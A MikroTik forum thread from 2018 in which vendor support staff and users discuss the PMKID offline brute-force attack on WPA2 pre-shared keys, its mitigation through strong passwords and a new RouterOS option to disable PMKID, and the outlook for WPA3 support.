Community discussions

 
strods
MikroTik Support
MikroTik Support
Topic Author
Posts: 1367
Joined: Wed Jul 16, 2014 7:22 am
Location: Riga, Latvia

WPA2 preshared key brute force attack

Thu Aug 09, 2018 10:37 am

It has come to our attention that a new way of brute force attack based on WPA2 standard using PMKID has come to light.

This attack actually is a brute force attack on WPA2 preshared key. The reason this attack is considered effective is because it can be performed offline, without actually attempting to connect to AP, based on a single sniffed packet from a valid key exchange.

This problem is not a vulnerability, but a way how wireless AP password can be guessed in an easier way.

In order to mitigate this type of attack you should use strong password that is hard to brute force.

To eliminate possibility of this attack entirely you can use WPA-PSK (do not forget to use aes-ccm encryption!). WPA-PSK does not include the field that is used to verify the password in this attack.
 
User avatar
eworm
Member Candidate
Member Candidate
Posts: 184
Joined: Wed Oct 22, 2014 9:23 am
Location: Oberhausen, Germany
Contact:

Re: WPA2 preshared key brute force attack

Thu Aug 09, 2018 10:50 am

With "WPA-PSK" you refer to a non-WPA2-configuration?
Manage RouterOS scripts and extend your devices' functionality: RouterOS Scripts
 
User avatar
Davis
Frequent Visitor
Frequent Visitor
Posts: 63
Joined: Mon Aug 01, 2011 12:27 pm
Location: Latvia, Riga
Contact:

Re: WPA2 preshared key brute force attack

Thu Aug 09, 2018 11:17 am

Are there any benefits for sending PMKID for non-EAP networks (some people claim that there aren't)?

If no, is it planned to fix this vulnerability (by not sending PMKID for PSK networks)?

There are actually 3 reasons why this attack is worse than previously known procedure:
1. It is possible to obtain PMKID for bruteforcing PSK password without any clients connected. This is especially bad for admin-only wifi networks (and other networks that usually have no clients connected).
2. Nothing will be logged in MikroTik. AFAIR with previously known procedure usually dissociation (usually many dissociations) followed by failed association attempt will be logged.
3. This will be unnoticable for wifi users.

Also what is behavior for this bug when "/interface wireless access-list" is used to provide different PSKs for different client MAC addresses?
And what is behavior for this bug when wireless interface has "default-authentication=no" (in combination with "/interface wireless access-list" entries)?

P.S. Of course a strong password must always be used, but also attack surface (points where attacks are possible) must always be reduced. In this case not sending PMKID would greatly reduce attack surface for rarely used networks.
 
strods
MikroTik Support
MikroTik Support
Topic Author
Posts: 1367
Joined: Wed Jul 16, 2014 7:22 am
Location: Riga, Latvia

Re: WPA2 preshared key brute force attack

Thu Aug 09, 2018 12:32 pm

Next RouterOS v6.43rc release will have an option that will allow to disable usage of PMKID. Setting should be used at your own risk knowing that some clients might not be able to connect.

If it will work well, then we will, most likely, backport these changes also to other RouterOS version release channels.
 
R1CH
Forum Veteran
Forum Veteran
Posts: 724
Joined: Sun Oct 01, 2006 11:44 pm

Re: WPA2 preshared key brute force attack

Thu Aug 09, 2018 12:46 pm

How do you get the PMKID from a Mikrotik AP? I have tried the attack on my wAP AC (WPA2-PSK), but the driver didn't implement the necessary fields.
 
Mplsguy
MikroTik Support
MikroTik Support
Posts: 226
Joined: Fri Jun 06, 2008 5:06 pm

Re: WPA2 preshared key brute force attack

Thu Aug 09, 2018 12:49 pm

Are there any benefits for sending PMKID for non-EAP networks (some people claim that there aren't)?
Well, there are no benefits, because using PMKID allows to skip authentication stage, which is non-existent when PSK is used anyway. The only reason to include PMKID when PSK is used is because 802.11 does not seem to be very specific about whether it must be included. What if there is some client that is very strict on checking what it receives?
If no, is it planned to fix this vulnerability (by not sending PMKID for PSK networks)?
We will add an option to disable sending PMKID in handshake message 1.
Also what is behavior for this bug when "/interface wireless access-list" is used to provide different PSKs for different client MAC addresses?
PMKID is generated based on PSK used in key exchange, so in order to brute force particular password you must sniff handshake frame sent by AP that contains PMKID generated using PSK that you are interested in. Note that "access-list" operates on mac-address that can be spoofed by attacker relatively easy, so it is not adding more security - attacker either needs to observe handshake of legitimate client or spoof clients mac-address and attempt handshake (it will fail, but nevertheless attacker will get the frame with PMKID). If you use per-client PSK, in case PSK for one client gets compromised, you only need to change it for particular client, not all of them.
And what is behavior for this bug when wireless interface has "default-authentication=no" (in combination with "/interface wireless access-list" entries)?
Considering that attacker can sniff frames and spoof mac-address, the only situation where this will help is when attacker can not figure out the mac-address it should use to attempt connecting, but this can not be considered protection. If attacker finds out mac-address of client that is allowed to connect, he can cause key handshake and attempt to brute force the PSK.
 
User avatar
Davis
Frequent Visitor
Frequent Visitor
Posts: 63
Joined: Mon Aug 01, 2011 12:27 pm
Location: Latvia, Riga
Contact:

Re: WPA2 preshared key brute force attack

Thu Aug 09, 2018 2:39 pm

The only reason to include PMKID when PSK is used is because 802.11 does not seem to be very specific about whether it must be included. What if there is some client that is very strict on checking what it receives?
Possibly Ubiquity might not be sending PMKID.

We will add an option to disable sending PMKID in handshake message 1.
Thank you very much for adding this option!

PMKID is generated based on PSK used in key exchange, so in order to brute force particular password you must sniff handshake frame sent by AP that contains PMKID generated using PSK that you are interested in. Note that "access-list" operates on mac-address that can be spoofed by attacker relatively easy, so it is not adding more security - attacker either needs to observe handshake of legitimate client or spoof clients mac-address and attempt handshake (it will fail, but nevertheless attacker will get the frame with PMKID). If you use per-client PSK, in case PSK for one client gets compromised, you only need to change it for particular client, not all of them.
So in this scenario:
  • "default-authentication=no" is set for access point
  • corresponding "/interface wireless security-profiles" has wpa-pre-shared-key and wpa2-pre-shared-key set to some value (e.g. "wpa-pre-shared-key=Password123 wpa2-pre-shared-key=Password123")
  • "/interface wireless access-list" has entries for clients with a different "private-pre-shared-key" for each client
  • at the moment of attack no clients are connected (and attacker does not know MAC addresses of clients)

The only information attacker can obtain is PMKID of "wpa2-pre-shared-key" mentioned in security-profile (in this example - hash that bruteforces to "Password123"), correct?
And attacker will not be able to connect with that password (assuming there are no access-list entries without private-pre-shared-key specified), correct?
I am describing this scenario as it illustrates possible mitigation of the vulnerability (locked down AP with per-device keys) in situation where this vulnerability has greatest effect (AP that is online all the time, but rarely has a client connected).

P.S. For other readers I can mention that in case a client is connected the classical WPA attack (involving spoofing client disconnection and recording the network traffic while client reconnects) can be applied and benefits of PMKID attack are very small (not disturbing client and not getting logged the classical "dissociation storm" in RouterOS).
 
Mplsguy
MikroTik Support
MikroTik Support
Posts: 226
Joined: Fri Jun 06, 2008 5:06 pm

Re: WPA2 preshared key brute force attack

Thu Aug 09, 2018 4:42 pm

So in this scenario:
  • "default-authentication=no" is set for access point
  • corresponding "/interface wireless security-profiles" has wpa-pre-shared-key and wpa2-pre-shared-key set to some value (e.g. "wpa-pre-shared-key=Password123 wpa2-pre-shared-key=Password123")
  • "/interface wireless access-list" has entries for clients with a different "private-pre-shared-key" for each client
  • at the moment of attack no clients are connected (and attacker does not know MAC addresses of clients)

The only information attacker can obtain is PMKID of "wpa2-pre-shared-key" mentioned in security-profile (in this example - hash that bruteforces to "Password123"), correct?
No. In order to obtain any PMKID attacker must get to key handshake phase that happens only after successful 802.11 association. If client is not in access-list, it is refused 802.11 association and AP does not even go to key handshake phase.
 
User avatar
Davis
Frequent Visitor
Frequent Visitor
Posts: 63
Joined: Mon Aug 01, 2011 12:27 pm
Location: Latvia, Riga
Contact:

Re: WPA2 preshared key brute force attack

Thu Aug 09, 2018 4:55 pm

No. In order to obtain any PMKID attacker must get to key handshake phase that happens only after successful 802.11 association. If client is not in access-list, it is refused 802.11 association and AP does not even go to key handshake phase.
So in this scenario attacker won't be able to obtain any password hashes (assuming attacker will not try to guess MAC addresses)?
 
Mplsguy
MikroTik Support
MikroTik Support
Posts: 226
Joined: Fri Jun 06, 2008 5:06 pm

Re: WPA2 preshared key brute force attack

Fri Aug 10, 2018 9:16 am

No. In order to obtain any PMKID attacker must get to key handshake phase that happens only after successful 802.11 association. If client is not in access-list, it is refused 802.11 association and AP does not even go to key handshake phase.
So in this scenario attacker won't be able to obtain any password hashes (assuming attacker will not try to guess MAC addresses)?
Correct. Like I said - in order to obtain PMKID attacker has to either observe or cause key handshake and that happens only after successful 802.11 association. In RouterOS access-list checking (and radius-mac-authentication as well) happens before key handshake (this is kind of obvious, because access-list or radius-mac-authentication can provide PSK).
 
Samot
Frequent Visitor
Frequent Visitor
Posts: 73
Joined: Sat Nov 25, 2017 10:01 pm

Re: WPA2 preshared key brute force attack

Fri Aug 10, 2018 3:41 pm

I think as long as your wifi password/keys are not something an idiot would use as their luggage combination you're fine.

Image
 
User avatar
erickbrito
just joined
Posts: 3
Joined: Mon Jul 20, 2015 6:41 pm

Re: WPA2 preshared key brute force attack

Fri Aug 10, 2018 7:43 pm

there are still several vulnerabilities, soon I will show some of them to be corrected.
Last edited by erickbrito on Fri Aug 10, 2018 8:19 pm, edited 1 time in total.
 
User avatar
Jotne
Forum Veteran
Forum Veteran
Posts: 706
Joined: Sat Dec 24, 2016 11:17 am

Re: WPA2 preshared key brute force attack

Fri Aug 10, 2018 7:58 pm

a inda a varias vulnerabilidade, depois vou mostrar umas das brechas a ser corrigido.
This is an English forum. Please post in English for all to read. You can edit your post and change it.
Nem todo mundo está lendo Português
.
Use Splunk to monitor your MikroTik Router

MikroTik->Splunk
 
User avatar
macgaiver
Forum Guru
Forum Guru
Posts: 1688
Joined: Wed May 18, 2005 5:57 pm
Location: Sol III, Sol system, Sector 001, Alpha Quadrant

Re: WPA2 preshared key brute force attack

Tue Aug 14, 2018 4:11 pm

What's new in 6.43rc56 (2018-Aug-13 11:13):
...
*) wireless - added option to disable PMKID for WPA2 (CLI only);
...
So far all devices i tried connects just fine.
With great knowledge comes great responsibility, because of ability to recognize id... incompetent people much faster.
 
Simono
newbie
Posts: 41
Joined: Tue Mar 20, 2018 9:41 am

Re: WPA2 preshared key brute force attack

Sat Aug 18, 2018 9:42 am

Of course this will be also as option on Capsman?
 
JimmyNyholm
Member Candidate
Member Candidate
Posts: 246
Joined: Mon Apr 25, 2016 2:16 am
Location: Sweden

Re: WPA2 preshared key brute force attack

Sat Aug 18, 2018 9:54 am

And what about working on WPA3?
 
bratislav
newbie
Posts: 49
Joined: Mon May 05, 2014 10:36 am

Re: WPA2 preshared key brute force attack

Sat Aug 18, 2018 1:25 pm

And what about working on WPA3?
According to Qualcomm you need new chipsets for WPA3 so it seems that old gear wont be able to support it ...
 
JimmyNyholm
Member Candidate
Member Candidate
Posts: 246
Joined: Mon Apr 25, 2016 2:16 am
Location: Sweden

Re: WPA2 preshared key brute force attack

Fri Aug 24, 2018 9:01 pm

And what about working on WPA3?
According to Qualcomm you need new chipsets for WPA3 so it seems that old gear wont be able to support it ...
As far as I can tell that is a big spit of "bullspit" ;-) WPA3 can be done in software only if the hardware features in a old chip is to slow. But then again braindead old cheap AP's have slow cpu's as well so........... But supporting a new standard is one thing. Turning on ALL nerd nobs of that new standard is another one.

SO....

Mikrotik: How about a statement of how,when,where will we be able to use WPA3 instead?
 
User avatar
Chupaka
Forum Guru
Forum Guru
Posts: 8142
Joined: Mon Jun 19, 2006 11:15 pm
Location: Minsk, Belarus
Contact:

Re: WPA2 preshared key brute force attack

Mon Aug 27, 2018 1:11 pm


Mikrotik: How about a statement of how,when,where will we be able to use WPA3 instead?
Or at least, "whether" :)
Russian-speaking forum: https://forum.mikrotik.by/. Welcome!

For every complex problem, there is a solution that is simple, neat, and wrong.

MikroTik. Your life. Your routing.
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 23608
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: WPA2 preshared key brute force attack

Mon Aug 27, 2018 2:20 pm

WPA3 is not supported in any client devices yet, as far as I know.
No answer to your question? How to write posts
 
User avatar
Jotne
Forum Veteran
Forum Veteran
Posts: 706
Joined: Sat Dec 24, 2016 11:17 am

Re: WPA2 preshared key brute force attack

Mon Aug 27, 2018 7:55 pm

Someone has to be the first, if all is waiting for all other to release WPA3 it will never come :)
.
Use Splunk to monitor your MikroTik Router

MikroTik->Splunk
 
User avatar
honzam
Forum Guru
Forum Guru
Posts: 2173
Joined: Wed Feb 27, 2008 10:27 pm
Location: Czech Republic

Re: WPA2 preshared key brute force attack

Mon Aug 27, 2018 10:57 pm

Someone has to be the first, if all is waiting for all other to release WPA3 it will never come :)
Yes it is true. Sometimes Mikrotik might be the first
LAN, FTTx, Wireless. ISP operator
 
notToNew
Member Candidate
Member Candidate
Posts: 135
Joined: Fri Feb 19, 2016 3:15 pm

Re: WPA2 preshared key brute force attack

Sun Sep 09, 2018 8:38 am

Of course this will be also as option on Capsman?
It already is. Just try it.
--------------------------------------------------------------------------------------------
CCR1036-12G-4S, several 952Ui-5ac2nD, ...
 
suzaanroshan
just joined
Posts: 1
Joined: Sun Sep 23, 2018 4:55 pm
Contact:

Re: WPA2 preshared key brute force attack

Sat Oct 13, 2018 1:44 pm

Thank you from your subscribers
Just what happens if we do not use aes-ccm encryption
 
sayto
just joined
Posts: 1
Joined: Sun Oct 14, 2018 10:39 am

Re: WPA2 preshared key brute force attack

Sun Oct 14, 2018 10:42 am

Thank you for the thread it was really helpful and informative.
 
sungirl
just joined
Posts: 1
Joined: Sun Oct 14, 2018 1:56 pm
Contact:

Re: WPA2 preshared key brute force attack

Sun Oct 14, 2018 3:42 pm

I think that WPA3 is not supported in any client devices yet

Who is online

Users browsing this forum: No registered users and 5 guests